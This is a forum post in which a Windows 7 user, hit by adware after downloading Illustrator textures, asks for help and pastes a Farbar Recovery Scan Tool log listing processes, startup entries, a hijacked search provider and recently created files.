Hello!
I downloaded some Adobe Illustrator textures from a bad website without checking it first and unfortunately, a program ran and I was suddenly flooded with tons of adware and junk!
I've ran Malware Anti-Malware Bytes, Malware Rootkits, and AdwCleaner and got rid of like 70+ bad items, but I am still getting redirects in Chrome, not in Firefox and something just feels -off- about my computer that I've never had before.
I've followed the cleaning guideline and here is the computer information requested... Thank you SO much in advance!!
Windows 7 Home Premium, Toshiba Satellite, 64-bit system.
FRST.TXT
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-07-2017
Ran by Kam (administrator) on THEMACHINE (30-07-2017 17:56:07)
Running from C:\Users\Kam\Desktop
Loaded Profiles: Kam (Available Profiles: Chef DeeWeaver & Kam)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(The OpenVPN Project) C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\SymcPCCULaunchSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
(Google Inc.) C:\Users\Kam\AppData\Local\Programs\Google\MusicManager\MusicManager.exe
(Tresorit) C:\Users\Kam\AppData\Local\Tresorit\v0.8\Tresorit.exe
(Elaborate Bytes AG) C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2010-12-14] (Conexant systems, Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2052392 2010-03-10] (Synaptics Incorporated)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-09] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [597936 2011-07-27] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508104 2015-10-30] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [VirtualCloneDrive] => C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe [89456 2011-03-07] (Elaborate Bytes AG)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS5.5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5.5ServiceManager\CS5.5ServiceManager.exe [1523360 2011-01-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [36760 2012-01-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [815512 2012-01-03] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4596904 2016-08-12] (Fitbit, Inc.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [235624 2015-01-09] (CANON INC.)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\Run: [Google Update] => C:\Users\Kam\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-29] (Google Inc.)
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\Run: [MusicManager] => C:\Users\Kam\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2016-02-01] (Google Inc.)
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4596904 2016-08-12] (Fitbit, Inc.)
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\Run: [GoogleChromeAutoLaunch_D6A468AF0CE68B1718B953080F9A4F10] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1197912 2017-06-22] (Google Inc.)
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\Run: [Tresorit] => C:\Users\Kam\AppData\Local\Tresorit\v0.8\Tresorit.exe [16886624 2017-06-26] (Tresorit)
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\MountPoints2: {0726b823-fc4e-11e1-b66c-00266cec285d} - E:\SETUP.EXE
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\MountPoints2: {143d9d80-a566-11e3-83ff-00266cec285d} - F:\MotorolaDeviceManagerSetup.exe -a
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\MountPoints2: {734d6d3d-d2cf-11e3-b05b-00266cec285d} - F:\LG_PC_Programs.exe
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\windows\system32\Bubbles.scr [899584 2010-11-20] (Microsoft Corporation)
HKLM\...\Providers\Internet Print Provider: inetpp.dll
HKLM\...\Providers\LanMan Print Services: C:\Windows\SysWOW64\win32spl.dll [497664 2017-05-09] (Microsoft Corporation)
Startup: C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesws.vbs [2017-07-29] ()
GroupPolicy: Restriction - Chrome <==== ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{48574AA1-AEEB-4888-A4A5-B61A230A30BE}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{C7E1E436-C09B-4DCC-9901-BF4C55805472}: [DhcpNameServer] 172.16.37.1
ManualProxies:
Internet Explorer:
==================
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\Software\Microsoft\Internet Explorer\Main,Start Page =
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://start.toshiba.com
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.bing.com/?pc=COSP&ptag=D073017-A915F698E57&form=CONMHP&conlogo=CT3335818
SearchScopes: HKLM -> DefaultScope {DA30EDCE-C252-4EE2-B4BA-74122EA5F0A4} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {DA30EDCE-C252-4EE2-B4BA-74122EA5F0A4} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 -> DefaultScope {DA30EDCE-C252-4EE2-B4BA-74122EA5F0A4} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {DA30EDCE-C252-4EE2-B4BA-74122EA5F0A4} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003 -> DefaultScope {A86B2A19-E524-4400-88AE-F9A39A7341B4} URL = hxxp://imp.bittrnt.com/impression.do?source=903578&sub_id=20170730&user_id=4722e6e3-f4ca-4e7f-bbc0-77cd4a58868b&traffic_source=install&event=ro_inb_search&implementation_id=utwin1&redir=https%3A%2F%2Fsearch.yahoo.com%2Fsearch%3Ffr%3Dchr-greentree_ie%26ei%3Dutf-8%26ilc%3D12%26type%3D903578%26p%3D&st={searchTerms}
SearchScopes: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D073017-A915F698E57&form=CONBDF&conlogo=CT3335818&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003 -> {8EEAC88A-079B-4b2c-80C1-7836F79EB40A} URL = hxxp://us.search.yahoo.com/search?p={searchTerms}&fr=chr-comodo
SearchScopes: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003 -> {A86B2A19-E524-4400-88AE-F9A39A7341B4} URL = hxxp://imp.bittrnt.com/impression.do?source=903578&sub_id=20170730&user_id=4722e6e3-f4ca-4e7f-bbc0-77cd4a58868b&traffic_source=install&event=ro_inb_search&implementation_id=utwin1&redir=https%3A%2F%2Fsearch.yahoo.com%2Fsearch%3Ffr%3Dchr-greentree_ie%26ei%3Dutf-8%26ilc%3D12%26type%3D903578%26p%3D&st={searchTerms}
SearchScopes: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003 -> {D694C623-42ED-4772-9D2D-F6F8C15B9BD6} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003 -> {DA30EDCE-C252-4EE2-B4BA-74122EA5F0A4} URL =
BHO: No Name -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> No File
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} - No File
Toolbar: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
FireFox:
========
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
R2 DirMngr; C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe [216576 2016-08-18] () [File not signed]
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5911720 2016-08-12] (Fitbit, Inc.)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\SymcPCCULaunchSvc.exe [123320 2013-12-11] (Symantec Corporation)
R2 OpenVPNServiceInteractive; C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe [52736 2017-02-16] (The OpenVPN Project) [File not signed]
S3 OpenVPNServiceLegacy; C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe [52736 2017-02-16] (The OpenVPN Project) [File not signed]
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 andnetadb; C:\windows\System32\Drivers\lgandnetadb.sys [31744 2014-05-27] (Google Inc) [File not signed]
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2015-10-05] (Malwarebytes Corporation)
S3 USBAAPL64; C:\windows\System32\Drivers\usbaapl64.sys [54784 2014-08-15] (Apple, Inc.) [File not signed]
S1 VBoxNetAdp; C:\windows\System32\DRIVERS\VBoxNetAdp6.sys [131144 2017-04-28] (Oracle Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-07-30 17:56 - 2017-07-30 17:57 - 000014688 _____ C:\Users\Kam\Desktop\FRST.txt
2017-07-30 17:55 - 2017-07-30 17:56 - 000000000 ____D C:\FRST
2017-07-30 17:55 - 2017-07-30 17:55 - 002381312 _____ (Farbar) C:\Users\Kam\Desktop\FRST64.exe
2017-07-30 17:40 - 2017-07-30 17:40 - 000000022 _____ C:\windows\S.dirmngr
2017-07-30 17:22 - 2017-07-30 17:22 - 001790024 _____ (Malwarebytes) C:\Users\Kam\Downloads\JRT.exe
2017-07-30 17:13 - 2017-07-30 17:40 - 000003244 _____ C:\windows\System32\Tasks\IORRT
2017-07-30 14:08 - 2017-07-30 14:08 - 000012083 _____ C:\Users\Kam\Downloads\Kam-Weaver(1).pdf
2017-07-29 23:01 - 2017-07-29 23:01 - 000001681 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CS5.1.lnk
2017-07-29 23:01 - 2017-07-29 23:01 - 000000000 ____D C:\ProgramData\ALM
2017-07-29 22:59 - 2017-07-29 22:59 - 000000000 ____D C:\adobeTemp
2017-07-29 22:15 - 2017-07-30 17:46 - 000000000 ____D C:\Users\Kam\AppData\Roaming\uTorrent
2017-07-29 22:15 - 2017-07-29 22:15 - 000000863 _____ C:\Users\Kam\Desktop\µTorrent.lnk
2017-07-29 22:15 - 2017-07-29 22:15 - 000000843 _____ C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2017-07-29 22:08 - 2017-07-29 22:08 - 000000000 ____D C:\Users\Kam\AppData\Local\{B5F70934-5E12-42d2-882D-62D42EA1FA67}
2017-07-29 21:13 - 2017-07-30 17:39 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-07-29 21:12 - 2017-07-30 16:17 - 000000000 ____D C:\Users\Kam\Desktop\mbar
2017-07-29 19:28 - 2017-07-29 21:45 - 000000000 ____D C:\Users\Kam\AppData\Roaming\jql12fozqws
2017-07-29 19:28 - 2017-07-29 21:45 - 000000000 ____D C:\Users\Kam\AppData\Roaming\j2ek4nkmxf3
2017-07-29 19:27 - 2017-07-29 21:59 - 000000000 ____D C:\windows\Minidump
2017-07-29 19:23 - 2017-07-29 20:10 - 000003072 _____ C:\Users\Kam\AppData\Local\uninstallce.exe
2017-07-29 19:23 - 2017-07-29 19:23 - 000024364 _____ C:\windows\System32\Tasks\{0C047F47-0C08-087D-7D11-09057A78110E}
2017-07-29 19:23 - 2017-07-29 19:23 - 000000000 ____D C:\Users\Kam\AppData\Local\ajaszq
2017-07-29 19:22 - 2017-07-29 21:45 - 000000000 ____D C:\Users\Kam\AppData\Local\bqlzodkp
2017-07-29 19:22 - 2017-07-29 19:22 - 000000000 ____D C:\Users\Kam\AppData\Roaming\c
2017-07-29 19:21 - 2017-07-29 21:45 - 000000000 ____D C:\Users\Kam\AppData\Roaming\j1ny5wi0r3z
2017-07-29 19:21 - 2017-07-29 21:45 - 000000000 ____D C:\Users\Kam\AppData\Roaming\ivrbqnikook
2017-07-29 19:19 - 2017-07-29 21:45 - 000000000 ____D C:\ProgramData\WindowsErrorReporting
2017-07-29 19:19 - 2017-07-29 20:10 - 000016762 _____ C:\windows\System32\Tasks\image IntelliPoint Toolbox
2017-07-29 19:19 - 2017-07-29 19:21 - 000000000 ____D C:\Users\Kam\AppData\Roaming\1mkimynvq3h
2017-07-29 19:16 - 2017-07-29 19:16 - 000000000 ____D C:\Users\Kam\AppData\Roaming\services local files
2017-07-29 19:14 - 2017-07-29 19:14 - 000140800 _____ C:\Users\Kam\AppData\Local\installer.dat
2017-07-29 18:38 - 2017-07-29 18:38 - 000001855 _____ C:\Users\Kam\Documents\oldparallelwikilinks.txt
2017-07-29 18:37 - 2017-07-29 18:37 - 000000738 _____ C:\Users\Kam\AppData\Local\recently-used.xbel
2017-07-28 21:24 - 2010-10-07 18:27 - 000002534 _____ C:\Users\Kam\Documents\jquery.titlealert.min.js
2017-07-28 21:24 - 2010-10-07 18:03 - 000005343 _____ C:\Users\Kam\Documents\jquery.titlealert.js
2017-07-28 06:01 - 2017-07-28 06:01 - 000051618 _____ C:\windows\uninstaller.dat
2017-07-17 17:56 - 2017-07-17 17:56 - 000012083 _____ C:\Users\Kam\Downloads\Kam-Weaver.pdf
2017-07-17 17:29 - 2017-07-30 17:49 - 000000000 ____D C:\Users\Kam\AppData\LocalLow\Mozilla
2017-07-11 22:20 - 2017-03-29 00:46 - 000000000 ____D C:\support
2017-07-11 22:20 - 2017-03-29 00:46 - 000000000 ____D C:\proguard
2017-07-11 22:20 - 2017-03-29 00:46 - 000000000 ____D C:\lib
2017-07-11 22:20 - 2017-03-29 00:46 - 000000000 ____D C:\bin
2017-07-11 22:11 - 2017-07-11 22:13 - 138449982 _____ C:\Users\Kam\Downloads\sdk-tools-windows-3859397.zip
2017-07-11 21:51 - 2017-06-29 21:15 - 000394448 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2017-07-11 21:51 - 2017-06-29 20:32 - 000346312 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2017-07-11 21:51 - 2017-06-29 19:57 - 002319872 _____ (Microsoft Corporation) C:\windows\system32\tquery.dll
2017-07-11 21:51 - 2017-06-29 19:57 - 002058240 _____ (Microsoft Corporation) C:\windows\system32\Query.dll
2017-07-11 21:51 - 2017-06-29 19:39 - 001549312 _____ (Microsoft Corporation) C:\windows\SysWOW64\tquery.dll
2017-07-11 21:51 - 2017-06-29 19:38 - 001363968 _____ (Microsoft Corporation) C:\windows\SysWOW64\Query.dll
2017-07-11 21:51 - 2017-06-28 23:27 - 025734656 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2017-07-11 21:51 - 2017-06-28 23:04 - 000066560 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2017-07-11 21:51 - 2017-06-28 23:03 - 000417792 _____ (Microsoft Corporation) C:\windows\system32\html.iec
2017-07-11 21:51 - 2017-06-28 23:03 - 000048640 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2017-07-11 21:51 - 2017-06-28 23:02 - 002899456 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2017-07-11 21:51 - 2017-06-28 23:02 - 000576512 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2017-07-11 21:51 - 2017-06-28 23:02 - 000088064 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2017-07-11 21:51 - 2017-06-28 22:55 - 000054784 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2017-07-11 21:51 - 2017-06-28 22:54 - 000034304 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2017-07-11 21:51 - 2017-06-28 22:51 - 000615936 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2017-07-11 21:51 - 2017-06-28 22:50 - 000817664 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2017-07-11 21:51 - 2017-06-28 22:50 - 000814080 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2017-07-11 21:51 - 2017-06-28 22:50 - 000144384 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2017-07-11 21:51 - 2017-06-28 22:50 - 000116224 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2017-07-11 21:51 - 2017-06-28 22:44 - 005975552 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2017-07-11 21:51 - 2017-06-28 22:43 - 000968704 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2017-07-11 21:51 - 2017-06-28 22:39 - 000489984 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2017-07-11 21:51 - 2017-06-28 22:31 - 000087552 _____ (Microsoft Corporation) C:\windows\system32\tdc.ocx
2017-07-11 21:51 - 2017-06-28 22:31 - 000077824 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2017-07-11 21:51 - 2017-06-28 22:30 - 000107520 _____ (Microsoft Corporation) C:\windows\system32\inseng.dll
2017-07-11 21:51 - 2017-06-28 22:27 - 000199680 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2017-07-11 21:51 - 2017-06-28 22:26 - 000092160 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2017-07-11 21:51 - 2017-06-28 22:23 - 020270592 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2017-07-11 21:51 - 2017-06-28 22:23 - 000499200 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll
2017-07-11 21:51 - 2017-06-28 22:23 - 000315392 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2017-07-11 21:51 - 2017-06-28 22:23 - 000062464 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2017-07-11 21:51 - 2017-06-28 22:23 - 000047616 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieetwproxystub.dll
2017-07-11 21:51 - 2017-06-28 22:22 - 000341504 _____ (Microsoft Corporation) C:\windows\SysWOW64\html.iec
2017-07-11 21:51 - 2017-06-28 22:22 - 000152064 _____ (Microsoft Corporation) C:\windows\system32\occache.dll
2017-07-11 21:51 - 2017-06-28 22:22 - 000064000 _____ (Microsoft Corporation) C:\windows\SysWOW64\MshtmlDac.dll
2017-07-11 21:51 - 2017-06-28 22:19 - 002290176 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2017-07-11 21:51 - 2017-06-28 22:17 - 000047104 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2017-07-11 21:51 - 2017-06-28 22:16 - 000030720 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2017-07-11 21:51 - 2017-06-28 22:14 - 000476160 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll
2017-07-11 21:51 - 2017-06-28 22:13 - 000663552 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll
2017-07-11 21:51 - 2017-06-28 22:13 - 000620032 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9diag.dll
2017-07-11 21:51 - 2017-06-28 22:13 - 000115712 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieUnatt.exe
2017-07-11 21:51 - 2017-06-28 22:11 - 000262144 _____ (Microsoft Corporation) C:\windows\system32\webcheck.dll
2017-07-11 21:51 - 2017-06-28 22:09 - 000806912 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2017-07-11 21:51 - 2017-06-28 22:09 - 000725504 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2017-07-11 21:51 - 2017-06-28 22:08 - 001359360 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2017-07-11 21:51 - 2017-06-28 22:07 - 002132992 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2017-07-11 21:51 - 2017-06-28 22:05 - 000416256 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2017-07-11 21:51 - 2017-06-28 22:01 - 000060416 _____ (Microsoft Corporation) C:\windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-07-11 21:51 - 2017-06-28 22:00 - 000091136 _____ (Microsoft Corporation) C:\windows\SysWOW64\inseng.dll
2017-07-11 21:51 - 2017-06-28 22:00 - 000073216 _____ (Microsoft Corporation) C:\windows\SysWOW64\tdc.ocx
2017-07-11 21:51 - 2017-06-28 21:58 - 015253504 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2017-07-11 21:51 - 2017-06-28 21:58 - 000168960 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2017-07-11 21:51 - 2017-06-28 21:56 - 000279040 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2017-07-11 21:51 - 2017-06-28 21:56 - 000076288 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2017-07-11 21:51 - 2017-06-28 21:54 - 000130048 _____ (Microsoft Corporation) C:\windows\SysWOW64\occache.dll
2017-07-11 21:51 - 2017-06-28 21:53 - 003240960 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2017-07-11 21:51 - 2017-06-28 21:52 - 004549632 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2017-07-11 21:51 - 2017-06-28 21:48 - 000230400 _____ (Microsoft Corporation) C:\windows\SysWOW64\webcheck.dll
2017-07-11 21:51 - 2017-06-28 21:47 - 000693248 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2017-07-11 21:51 - 2017-06-28 21:46 - 002057216 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2017-07-11 21:51 - 2017-06-28 21:46 - 001155072 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmlmedia.dll
2017-07-11 21:51 - 2017-06-28 21:43 - 013663744 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
